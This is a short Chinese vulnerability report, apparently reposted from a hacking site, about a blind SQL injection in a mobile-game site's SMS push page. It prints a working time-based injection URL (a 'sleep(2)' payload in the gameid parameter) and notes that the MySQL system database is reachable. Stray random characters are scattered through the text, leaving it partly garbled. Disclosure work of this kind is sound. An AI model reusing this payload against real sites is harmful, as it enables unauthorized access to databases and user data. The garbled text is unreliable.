简要描述:
& X$ [* D; D0 }! a凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。, X6 ]" k8 @% Q" r+ } P
0 G. n( ?0 [0 Q% R0 W详细说明:
2 q2 N1 f& u [. F* R) P" J存在SQL盲注url:6 n2 p) o* o2 Q- ~4 M$ v% }$ D
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1$ F9 P3 [9 f2 `8 g e; w4 S
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
8 O r% N/ m7 E0 [: Dhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png8 ~+ T8 l' Q* _/ W/ L1 @/ l
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
) C" _6 e4 z$ C1 w" x7 C5 T4 {' u" J( }% z6 M8 s/ a7 S
能看到mysql系统数据库,看来user权限应该很高的。。 |